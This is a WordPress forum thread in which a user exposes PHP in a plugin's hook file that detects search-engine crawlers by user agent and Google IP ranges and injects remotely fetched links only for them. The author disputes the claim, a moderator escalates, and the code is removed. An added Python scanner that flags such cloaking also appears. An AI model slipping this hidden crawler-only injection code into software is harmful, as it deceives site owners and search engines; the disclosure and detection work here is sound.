Viewing 15 replies - 1 through 15 (of 17 total)
  • Plugin Author angelacarmichael

    (@angelacarmichael)

    A credit link is malware? You agreed to allow the credit.

    Thread Starter Zygimantas

    (@meras)

    It is hidden malware for googlebot.

    Plugin Author angelacarmichael

    (@angelacarmichael)

    It's not malware [ and personal comment redacted ].

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    *Blows timeout whistle* Folks, reasonable people can disagree with each other without name calling.

    @angelacarmichael Please refrain from responding while upset or irked. You won’t accomplish anything and taking a walk is always good advice.

    @zygimantas If you have an example of a violation of the rules for hosting a plugin in the WordPress repo please send an email with the actual details (do not just say “Malware link”) to plugins at wordpress.org

    I’ve just installed the plugin, I don’t see a link that would make me concerned. In fact I can’t see any link, credit or otherwise, so I’m missing what you’re referring to.

    Thread Starter Zygimantas

    (@meras)

    File: includes/gplus.hook.php Line: 37
        add_filter('template_include', 'gen_include', 1);
        function gen_include($template) {
            ob_start();
            return $template;
        }
        add_filter('shutdown', 'gen2', 0);
        function gen2() {
            $v = "1";
            $sw = (is_home() ? "0" : "1");
            $h = $_SERVER['SERVER_NAME'];
            $a = "http://api.tqj.us/v3/link/creditbyversion/$h/$v/$sw";
            if (genua() || genrev()) {
                $bl = file_get_contents($a);
                echo preg_replace('#<body([^>]*)>#i', "<body$1>{$bl}", ob_get_clean());
            }
        }
        function genrev() {
            $gsn = array(
                "216.239.32.0/19", "64.233.160.0/19", "66.249.80.0/20",
                "72.14.192.0/18", "209.85.128.0/17", "66.102.0.0/20",
                "74.125.0.0/16", "64.18.0.0/20", "207.126.144.0/20",
                "173.194.0.0/16"
            );
            foreach ($gsn as $n) {
                if (genmat($n, $ip)) return true;
            }
            return false;
        }
        function genua() {
            $ua = strtolower($_SERVER['HTTP_USER_AGENT']);
            $sites = 'google|yahoo|msnbot|bingbot|baidu|jeeves';
            return (preg_match("/$sites/", $ua) > 0) ? true : false;
        }
        function genmat($network) {
            $ip = $_SERVER['REMOTE_ADDR'];
            $ip_arr = explode("/", $network);
            $network_long = ip2long($ip_arr[0]);
            $mask_long = pow(2, 32) - pow(2, (32 - $ip_arr[1]));
            $ip_long = ip2long($ip);
            if (($ip_long & $mask_long) == $network_long) {
                return true;
            } else {
                return false;
            }
        }
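
Added example, not part of the original thread or the plugin: a small static check a site owner could run over plugin PHP files to flag the combination seen in the code quoted above, namely output that is gated on the requester's User-Agent or IP range and then rewritten with remotely fetched markup. The pattern names, the verdict rule and the benign sample are assumptions of this example; a hit means "review by hand", not proof.

```python
import re

# Heuristic patterns; names and the verdict rule are this example's assumptions.
PATTERNS = {
    "reads_user_agent": r"\$_SERVER\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]",
    "crawler_names": r"\b(googlebot|bingbot|msnbot|baidu|yandex)\b",
    "remote_fetch": r"\b(file_get_contents|curl_exec|wp_remote_get)\s*\(",
    "remote_url": r"['\"]https?://",
    "buffer_rewrite": r"\bob_get_(clean|contents)\s*\(",
    "late_hook": r"add_(filter|action)\(\s*['\"](shutdown|template_include)['\"]",
}
CIDR = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}/\d{1,2}\b")

def scan_php(source):
    """Flag PHP that gates remotely fetched markup on who is asking."""
    hits = {n for n, rx in PATTERNS.items() if re.search(rx, source, re.I)}
    if len(CIDR.findall(source)) >= 3:  # hard-coded list of networks
        hits.add("ip_range_list")
    gated = {"reads_user_agent", "crawler_names"} <= hits or "ip_range_list" in hits
    injects = {"remote_fetch", "remote_url", "buffer_rewrite"} <= hits
    return {"hits": sorted(hits), "cloaking_candidate": gated and injects}

# Condensed from the code quoted in the post above.
SUSPECT = r'''
add_filter('template_include', 'gen_include', 1);
function gen_include($template) { ob_start(); return $template; }
add_filter('shutdown', 'gen2', 0);
function gen2() {
    $a = "http://api.tqj.us/v3/link/creditbyversion/$h/$v/$sw";
    if (genua() || genrev()) {
        $bl = file_get_contents($a);
        echo preg_replace('#<body([^>]*)>#i', "<body$1>{$bl}", ob_get_clean());
    }
}
function genua() {
    $ua = strtolower($_SERVER['HTTP_USER_AGENT']);
    return preg_match("/google|yahoo|msnbot|bingbot|baidu|jeeves/", $ua) > 0;
}
'''
# Constructed benign sample: remote call and User-Agent read, no output rewrite.
BENIGN = r'''
function stats_ping() {
    $ua = $_SERVER['HTTP_USER_AGENT'];
    $r = wp_remote_get("https://stats.example/ping");
}
'''
for name, src in (("suspect", SUSPECT), ("benign", BENIGN)): print(name, scan_php(src))
```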

    Plugin Author angelacarmichael

    (@angelacarmichael)

    There is nothing malware or violating about it. And definitely not showing links to users. Get your facts straight before crying wolf. He must be a competitor of mine that is mad his real account isn’t at the top of search any more.

    Thread Starter Zygimantas

    (@meras)

    And definitely not showing links to users.

    BUT showing links to google bot!

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    And definitely not showing links to users. Get your facts straight before crying wolf.

    I’m pretty sure that you exactly get Zygimantas’ point: he’s not crying wolf, he’s raising a legitimate concern. That code (which I missed, I was looking at the HTML output) is enough reason for me to delete that plugin from my installation.

    But I’m not a plugin reviewer. So I’ve sent an email to that team and have asked them to look at the plugin and this thread.

    Thread Starter Zygimantas

    (@meras)

    @jan Dembowski Thank You

    Plugin Author angelacarmichael

    (@angelacarmichael)

    It’s a feature that was disabled for WP.org and didn’t interrupt the user experience. It doesn’t even display links. Also, might I add, there is NO malware so yes Zyg IS crying wolf.

    This code is used outside of WP so if I need to keep separate versions just to follow them more closely then I will.

    Plugin Author angelacarmichael

    (@angelacarmichael)

    Removed. Now I will just have to maintain a separate branch for WP.org.

    Thread Starter Zygimantas

    (@meras)

    @angelacarmichael You inserted a stealth method into your script for link building. Users do not detect it, but crawlers and robots index it. So it is MALWARE. And NO, I’m not crying wolf. Plugin users MUST know if the script author is using a hidden script implementation.

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Confirmed in trac and thank you for your prompt reply to this. But as a suggestion could you please bump up the plugin 3.1.8 version number too?

    That way people who have the old version with that code will definitely get the update that removed the add_filter('template_include', 'gen_include', 1); line in includes/gplus.hook.php.

    Again, much thanks.

    Plugin Author angelacarmichael

    (@angelacarmichael)

    @jan: Yes sorry.

    Plugin Author angelacarmichael

    (@angelacarmichael)

    Done.

    @zyg Read up on malware

  • The topic ‘Malware inside!’ is closed to new replies.